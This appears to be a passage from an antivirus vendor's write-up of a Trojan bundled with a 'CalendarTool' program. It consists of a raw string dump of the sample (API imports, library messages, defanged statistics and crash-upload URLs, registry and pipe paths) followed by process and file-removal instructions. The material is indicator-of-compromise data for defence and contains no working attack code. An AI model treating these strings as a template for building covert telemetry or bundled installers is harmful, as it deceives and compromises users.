, LogReport no
Kernel32.dll
explorer.exe
%s failed with %d
Calendar.exe
CrashReport.exe
CrashUL.exe
2.0.0.11189
dump.theadvancedcalendar.com
BugReportConfig.ini
BugReportConfig
5.1.2600.5512 (xpsp.080413-211
CalendarServ.exe
"%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe"
%Program Files%\CalendarTool\2.0.0.11189
%Documents and Settings%\LocalService\Application Data\CalendarTool\dump
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe
2,0,0,11189

Calendar.exe_3428:




.text
`.rdata
@.data
.rsrc
@.reloc
8%uEP3
>.uBV
tcHHtCHt.Ht
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.2.24
libjpeg error %d <%s> from %s [%d %d]
sampler.begin
--- SkMatrix::setPolyToPoly count out of range %d
1.2.3
0123456789ABCDEFlibpng error: %s
libpng error: %s, offset=%d
libpng error no. %s: %s
libpng warning: %s
libpng warning no. %s: %s
NULL row buffer for row %ld, pass %d
iTXt chunk not supported.
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
IDCT output block size %d not supported
Invalid component ID %d in SOS
Bogus message code %d
?I got %f and %f as radii to SkPath::AddRoundRect, but negative radii are not allowed.
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
Unknown compression type %d
zero length keyword
keyword length must be 1 - 79 characters
Zero length keyword
extra interior spaces removed from keyword
leading spaces removed from keyword
trailing spaces removed from keyword
invalid keyword character 0xX
Out of memory while procesing keyword
Empty keyword in tEXt chunk
Empty keyword in zTXt chunk
Empty keyword in iCCP chunk
Empty keyword in sPLT chunk
white_x=%f, white_y=%f
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
%ld%c
"@Skia Error: %s
Invalid Operation
inflate 1.2.3 Copyright 1995-2005 Mark Adler
====== typeface index %d
%s empty contour
?%s shouldn't get here if all four points are about equal
%s shouldn't get here if all four points are about equal
Sorry, you passed me a bitmap resize method I have never heard of: %d
?456789:;<=
!"#$%&'()* ,-./0123
kernel32.dll
Product_CloudMgr_Public_Exe
Product_CloudMgr_Exe
Product_AppsRobo_Public_Exe
Product_AppsRobo_Exe
Product_Allinone_Public_Exe
Product_Allinone_Exe
Product_Newspark_Public_Exe
Product_Newspark_Exe
Product_Spark_Public_Exe
Product_Spark_Exe
Product_Ime_Public_Exe
Product_Ime_Exe
Product_AppStore_Public_Exe
Product_AppStore_Exe
Product_Pcf_Public_Exe
Product_Pcf_Exe
Product_Bav_Public_Exe
Product_Bav_Exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
?#%X.y
operator
GetProcessWindowStation
USER32.DLL
portuguese-brazilian
RegDeleteKeyExW
SYN.ACK
ACK.SYN
XXX
D:\jenkins\workspace\calendar\Release\calendar.pdb
CalendarEntry.dll
USP10.dll
KERNEL32.dll
EnumThreadWindows
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
RegNotifyChangeKeyValue
RegCreateKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
GdiplusShutdown
gdiplus.dll
PSAPI.DLL
WinHttpCloseHandle
WinHttpReadData
WinHttpQueryDataAvailable
WinHttpQueryHeaders
WinHttpReceiveResponse
WinHttpWriteData
WinHttpSetOption
WinHttpSendRequest
WinHttpGetProxyForUrl
WinHttpGetIEProxyConfigForCurrentUser
WinHttpAddRequestHeaders
WinHttpOpenRequest
WinHttpConnect
WinHttpCrackUrl
WinHttpSetTimeouts
WinHttpOpen
WINHTTP.dll
COMCTL32.dll
IMM32.dll
IPHLPAPI.DLL
VERSION.dll
GetProcessHeap
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
GetCPInfo
GetConsoleOutputCP
SHFileOperationW
ShellExecuteW
USERENV.dll
WTSAPI32.dll
.?AVKeyboardEventArgs@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVBugReportHelper@@
zcÁ
.?AVReportNoInTimeBufferTask@statistics@@
.?AVReportNoInTimeFileTask@statistics@@
.?AVReportImpl@statistics@@
.?AVIDataReport@statistics@@
.?AVCMD5Checksum@@
$iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:750EF8DCD4EE11E4811AEFE45CB1504A" xmpMM:DocumentID="xmp.did:750EF8DDD4EE11E4811AEFE45CB1504A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:750EF8DAD4EE11E4811AEFE45CB1504A" stRef:documentID="xmp.did:750EF8DBD4EE11E4811AEFE45CB1504A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>U
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:750EF8D8D4EE11E4811AEFE45CB1504A" xmpMM:DocumentID="xmp.did:750EF8D9D4EE11E4811AEFE45CB1504A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:750EF8D6D4EE11E4811AEFE45CB1504A" stRef:documentID="xmp.did:750EF8D7D4EE11E4811AEFE45CB1504A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:750EF8D4D4EE11E4811AEFE45CB1504A" xmpMM:DocumentID="xmp.did:750EF8D5D4EE11E4811AEFE45CB1504A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5F598F09D4ED11E4811AEFE45CB1504A" stRef:documentID="xmp.did:5F598F0AD4ED11E4811AEFE45CB1504A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:EB4B29E1BA7D11E48F08A8D685613918" xmpMM:DocumentID="xmp.did:EB4B29E2BA7D11E48F08A8D685613918"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:15C73822BA7D11E48F08A8D685613918" stRef:documentID="xmp.did:EB4B29E0BA7D11E48F08A8D685613918"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
BF.mkQl
%f_#J
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:B6910D4AB9A811E481CDC360006A6213" xmpMM:DocumentID="xmp.did:B6910D4BB9A811E481CDC360006A6213"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B6910D48B9A811E481CDC360006A6213" stRef:documentID="xmp.did:B6910D49B9A811E481CDC360006A6213"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
i\^ `.er
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:0710B7CEBB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:0710B7CFBB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0710B7CCBB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:0710B7CDBB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:0710B7D2BB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:0710B7D3BB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0710B7D0BB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:0710B7D1BB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Z
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:125C998DBB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:125C998EBB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0710B7D4BB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:125C998CBB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:05EDF0F9BB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:05EDF0FABB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:05EDF0F7BB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:05EDF0F8BB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>@
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:05EDF0FDBB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:05EDF0FEBB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:05EDF0FBBB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:05EDF0FCBB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:0710B7CABB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:0710B7CBBB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:05EDF0FFBB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:05EDF100BB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>4
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:6162DBA6BFE511E496FCAA5ECD2EBCEB" xmpMM:DocumentID="xmp.did:6162DBA7BFE511E496FCAA5ECD2EBCEB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6162DBA4BFE511E496FCAA5ECD2EBCEB" stRef:documentID="xmp.did:6162DBA5BFE511E496FCAA5ECD2EBCEB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:6162DBAABFE511E496FCAA5ECD2EBCEB" xmpMM:DocumentID="xmp.did:6162DBABBFE511E496FCAA5ECD2EBCEB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6162DBA8BFE511E496FCAA5ECD2EBCEB" stRef:documentID="xmp.did:6162DBA9BFE511E496FCAA5ECD2EBCEB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>a
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:68E3DF5FBFED11E496FCAA5ECD2EBCEB" xmpMM:DocumentID="xmp.did:68E3DF60BFED11E496FCAA5ECD2EBCEB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6162DBACBFE511E496FCAA5ECD2EBCEB" stRef:documentID="xmp.did:68E3DF5EBFED11E496FCAA5ECD2EBCEB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
6"6&6*6.62666=6
0!00u0}0
8 9$9(9,9094989<9
> >&> >:>
3-373N3X3s3}3
9#9'9 9/939
6l6
1!101:1@1
2$3(3,30343
7$9(9,9094989
=&?-?8???
0 0$0(0,00040
9#=2=#>2>
7.84888<8@8
: :$:(:,:0:4:8:
8 ?$?(?,?0?4?
8 8(8,80848
; ;(;0;<;`;
9@9\9`9|9
2$2,2024282<2@2
Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.
uisys\uilog_%d.log
%s resource id('%s') duplicate
bSendHoverMsg
bPassword
\skin.xml
G_DIRECTUI_RECYCLE_OBJ_MSG
G_DIRECTUI_CLEAR_OBJ_MSG
wSubclassLayeredWindow[%ld],Title:%s
d:d:d d-d-d
[%d]%s -> %s
W%d %d %d %d %d %d %d
%f %f %f %f %d %d %d
%d %d %d %d
%d %d
%s %d %d
%d %d %d %d %s %x %d
%d:%d
DumpConfig.ini
BugInfoUploadURL
BugURL
\StringFileInfo\x\%s
\StringFileInfo\X
mscoree.dll
KERNEL32.DLL
{421DADC9-79C8-4211-82AD-D62013B970A7}
ntdll.dll
%d.%d
okernel32.dll
hXXp://VVV.theadvancedcalendar.com/cgi-bin-py/calendar_uu.cgi
2.0.0.11189
hXXp://VVV.theadvancedcalendar.com/cgi-bin-py/calendar_statistic.cgi
CrashReport.exe
CrashUL.exe
dump.theadvancedcalendar.com
BugReportConfig.ini
BugReportConfig
@WinHttpClient
Language.json
%sConfig%d\%s
%s%s%s
rhXXp://ime.baidu.jp/type/api/horoscope.php
hXXp://horoscopovirtual.bol.uol.com.br/horoscopo/xml-geradores/baidu/
hXXp://horoscope.mthai.com/feed-baidu.php
%s\%d.json
%d/%d/%d
d-d-d
%d.%d.%d
%[^;]; charset=%s
Festival_special.json
Config%d\%s
Config%d
Festival.json
Config%d\
%s\FestivalPicture\%s
%d-%d~%d
%d-%d
%d-%d-%d
Shell32.dll,Control_RunDLL "timedate.cpl"
rundll32.exe
config.json
AHKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
AAdvapi32.dll
Constellation_%s_layer
Constellation_%sValue%d
Constellation_%s0Value%d
Constellation_%sHalfValue%d
constellation_icon_%s_style
constellation_icon_%s0_style
constellation_icon_%shalf_style
head.default
%s %d
%s de %d
%s,%d
Tahoma.14.bold
1.2 1 0 0 55 255 0
0 1 0 0 55 255 0
%s d
%s%d %s
d:d:d
%s%d%s
1.0 0.1 0 0 255 55 4
1.0 0 0 0 255 55 4
1 1.2 0 0 255 55 4
Aexplorer.exe
report_thread_cs.wuyg
statistics::ReportImpl::~ReportImpl
1.0.0.1
statistics::ReportImpl::SerializeAllNoIntime
statistics::ReportImpl::WriteToNoIntimeFile
%s, no in time file, %s
%dddddd
%s out errir, upload inproc, %s
%s begin
%s end
%d.d.d-d:d:d
C:\08D88547-FF9F-4953-B96D-7B2B491E219E
%s_%d%s
XXxXXXXXXXX
\%d%d%0x
%s, record mix, old= %d, new= %d
%s, error, no call begin, threadid = %d
%s, in time file : %s
%s, error no begin threadid=%d
statistics::ReportNoInTimeFileTask::RunThreadTask
%s, error no nointime data
statistics::ReportNoInTimeBufferTask::RunThreadTask
%s, post fail, %s
%s, can del %s
%s, not can del %s
%s, error start %s
%s, setevent, outproc %s
\Guid\Common\I18N\conf.db
2\*.*
statistics::WinHttpPostMime::PostBuffer
%s file data empty
%s crackurl fail, %s
HTTP/1.1
\\.\pipe\I18NStat\c_s_w_u_y_g
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
\\.\PhysicalDrive%d
\\.\Scsi%d:
127.0.0.1
http=
https=
5.1.2600.5512 (xpsp.080413-211
Calendar.exe
"%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe" from_service
%Program Files%\CalendarTool\2.0.0.11189
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump
%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe
calendar.exe






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    imapi.exe:1932
    InstallHelper.exe:3084
    InstallHelper.exe:3480
    nst6.tmp.exe:2736
    nst6.tmp.exe:2804
    CalendarServ.exe:3180
    CalendarServ.exe:3156
    yeaplayer_br_ibd_bundle.exe:2328
    %original file name%.exe:1216
    rundll32.exe:1976
    setup.exe:1948
    setup.exe:348
    291734.exe:2712
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %WinDir%\Temp\g5z08pj0.TMP (146970 bytes)
    %Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
    %Documents and Settings%\All Users\Documents\Tools\Common\I18N\conf.db (759 bytes)
    %Documents and Settings%\LocalService\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
    %Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (24 bytes)
    C:\MINI.LOG (5089 bytes)
    %Documents and Settings%\All Users\Documents\Guid\Common\I18N\conf.db (759 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P5SDE3AF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYJ45YV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KWD5RP0\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QY4FSATI\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe (141913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\11075\51486_a.xml (8672 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\cookies (188 bytes)
    %Documents and Settings%\%current user%\Application Data\YeaPlayer_br_IBD_Bundle.exe (4185 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_pressed.png (172 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Festival.json (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config7\Language.json (1 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_color.png (440 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\CalendarEntry.dll (4316 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_grey.png (248 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\CrashUL.exe (8165 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config7\Festival.json (1568 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_hover.png (174 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_pressed.png (189 bytes)
    %Program Files%\CalendarTool\2.0.0.11189\Config8\Config.json (2 bytes)
